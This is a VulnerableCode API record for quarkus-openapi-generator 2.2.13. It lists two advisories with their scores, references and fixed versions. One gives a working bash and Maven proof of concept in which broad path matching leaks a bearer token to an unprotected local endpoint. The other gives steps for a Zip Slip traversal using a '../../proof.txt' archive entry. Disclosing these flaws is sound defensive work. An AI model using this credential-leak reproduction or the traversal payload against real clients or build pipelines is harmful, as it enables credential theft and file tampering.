Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1015539?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1015539?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.2.13", "type": "maven", "namespace": "io.quarkiverse.openapi.generator", "name": "quarkus-openapi-generator", "version": "2.2.13", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.16.0-lts", "latest_non_vulnerable_version": "2.17.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95383?format=api", "vulnerability_id": "VCID-dtfz-cu9w-h7e3", "summary": "quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations\n### Summary\n\nThe generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.\n\n### Details\n\nThe runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats `{param}` placeholders as `.*`, which incorrectly allows a single path parameter to consume `/`.\n\nAs a result, a protected path such as `/repos/{ref}` also matches `/repos/foo/bar`, even though `/repos/{owner}/{repo}` is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.\n\nThis affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code.\n\n### PoC\n\n```bash\nmkdir -p /tmp/qoag-poc/src/main/java/org/acme\nmkdir -p /tmp/qoag-poc/src/main/resources\nmkdir -p /tmp/qoag-poc/src/main/openapi\n\ncat > /tmp/qoag-poc/pom.xml <<'EOF'\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n <groupId>org.acme</groupId>\n <artifactId>qoag-poc</artifactId>\n <version>1.0.0</version>\n\n <properties>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n <maven.compiler.release>17</maven.compiler.release>\n <quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id>\n <quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id>\n <quarkus.platform.version>3.34.3</quarkus.platform.version>\n <qoag.version>2.16.0</qoag.version>\n </properties>\n\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>${quarkus.platform.group-id}</groupId>\n <artifactId>${quarkus.platform.artifact-id}</artifactId>\n <version>${quarkus.platform.version}</version>\n <type>pom</type>\n <scope>import</scope>\n </dependency>\n </dependencies>\n </dependencyManagement>\n\n <dependencies>\n <dependency>\n <groupId>io.quarkiverse.openapi.generator</groupId>\n <artifactId>quarkus-openapi-generator</artifactId>\n <version>${qoag.version}</version>\n </dependency>\n <dependency>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-rest</artifactId>\n </dependency>\n <dependency>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-rest-client-jackson</artifactId>\n </dependency>\n </dependencies>\n\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-maven-plugin</artifactId>\n <version>${quarkus.platform.version}</version>\n <extensions>true</extensions>\n <executions>\n <execution>\n <goals>\n <goal>build</goal>\n <goal>generate-code</goal>\n <goal>generate-code-tests</goal>\n </goals>\n </execution>\n </executions>\n </plugin>\n <plugin>\n <artifactId>maven-compiler-plugin</artifactId>\n <version>3.14.0</version>\n <configuration>\n <parameters>true</parameters>\n </configuration>\n </plugin>\n </plugins>\n </build>\n</project>\nEOF\n\ncat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF'\nopenapi: 3.0.3\ninfo:\n title: repro\n version: 1.0.0\n\npaths:\n /repos/{ref}:\n get:\n operationId: getRef\n parameters:\n - in: path\n name: ref\n required: true\n schema:\n type: string\n security:\n - bearerAuth: []\n responses:\n \"200\":\n description: ok\n content:\n text/plain:\n schema:\n type: string\n\n /repos/{owner}/{repo}:\n get:\n operationId: getOwnerRepo\n parameters:\n - in: path\n name: owner\n required: true\n schema:\n type: string\n - in: path\n name: repo\n required: true\n schema:\n type: string\n responses:\n \"200\":\n description: ok\n content:\n text/plain:\n schema:\n type: string\n\ncomponents:\n securitySchemes:\n bearerAuth:\n type: http\n scheme: bearer\nEOF\n\ncat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF'\nquarkus.http.port=8081\nquarkus.openapi-generator.codegen.default-security-scheme=bearerAuth\nquarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro\nquarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080\nquarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET\nEOF\n\ncat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF'\npackage org.acme;\n\nimport jakarta.ws.rs.GET;\nimport jakarta.ws.rs.Path;\nimport jakarta.ws.rs.Produces;\nimport jakarta.ws.rs.core.MediaType;\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\n@Path(\"/trigger\")\npublic class TriggerResource {\n @RestClient\n org.acme.repro.api.DefaultApi api;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String trigger() {\n api.getOwnerRepo(\"foo\", \"bar\");\n return \"done\";\n }\n}\nEOF\n\npython - <<'PY' &\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n print(\"PATH=\" + self.path, flush=True)\n print(\"AUTH=\" + str(self.headers.get(\"Authorization\")), flush=True)\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b\"ok\")\n def log_message(self, fmt, *args):\n pass\nHTTPServer((\"127.0.0.1\", 18080), H).serve_forever()\nPY\n\ncd /tmp/qoag-poc\nmvn -q package -DskipTests\njava -jar target/quarkus-app/quarkus-run.jar &\nsleep 8\ncurl -s http://127.0.0.1:8081/trigger\n\n# PATH=/repos/foo/bar\n# AUTH=Bearer SECRET\n```\n\n### Impact\n\nClients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42333", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44506", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44483", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44471", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44527", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44519", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42333" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42333", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42333" }, { "reference_url": "https://github.com/advisories/GHSA-fr8f-rwjx-f32v", "reference_id": "GHSA-fr8f-rwjx-f32v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fr8f-rwjx-f32v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/119447?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0-lts", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0-lts" }, { "url": "http://public2.vulnerablecode.io/api/packages/119449?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.17.0" } ], "aliases": [ "CVE-2026-42333", "GHSA-fr8f-rwjx-f32v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dtfz-cu9w-h7e3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90297?format=api", "vulnerability_id": "VCID-nxrd-h3dz-w7fm", "summary": "quarkus-openapi-generator extension has Zip Slip Path Traversal in ApicurioCodegenWrapper class\n### Summary\nA path traversal vulnerability was discovered in the quarkus-openapi-generator extension\n\n### Details\nThe `unzip()` method in `ApicurioCodegenWrapper.java` extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as `new File(toOutputDir, entry.getName())` and the content is written immediately. A malicious ZIP archive containing entries with path traversal sequences (e.g., `../../malicious.java`) would write files outside the target directory.\n\nThe interesting thing is that the client module in the same repository already has the correct fix. `OpenApiGeneratorStreamCodeGen.java` at line 137 performs proper `normalize()` and `startsWith()` validation. The server module was simply missed.\n\n### PoC\nThis vulnerability is exploitable when an attacker controls or can intercept the ZIP archive served by the Apicurio registry. In environments where the registry connection is over an untrusted network or where TLS is not properly configured, exploitation becomes practical. The attack occurs at build/codegen time.\n\n1. Create a ZIP file containing an entry named `../../proof.txt` with arbitrary content\n2. Configure quarkus-openapi-generator to use the server (Apicurio) code generation path\n3. Serve the malicious ZIP from a controlled or MITM'd Apicurio registry endpoint\n4. Trigger code generation\n5. Observe that `proof.txt` is written two directories above the intended output\n\n\n### Impact\nAn attacker who can serve a crafted ZIP to the code generation pipeline could write arbitrary files on the build machine. This could overwrite source files, inject malicious code into the build output, or modify configuration files. In CI/CD environments, this could lead to supply chain compromise.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40180", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26561", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26468", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26463", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26519", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26571", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40180" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40180", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40180" }, { "reference_url": "https://github.com/advisories/GHSA-jx2w-vp7f-456q", "reference_id": "GHSA-jx2w-vp7f-456q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jx2w-vp7f-456q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111614?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-dtfz-cu9w-h7e3" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0" } ], "aliases": [ "CVE-2026-40180", "GHSA-jx2w-vp7f-456q" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrd-h3dz-w7fm" } ], "fixing_vulnerabilities": [], "risk_score": "3.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.2.13" }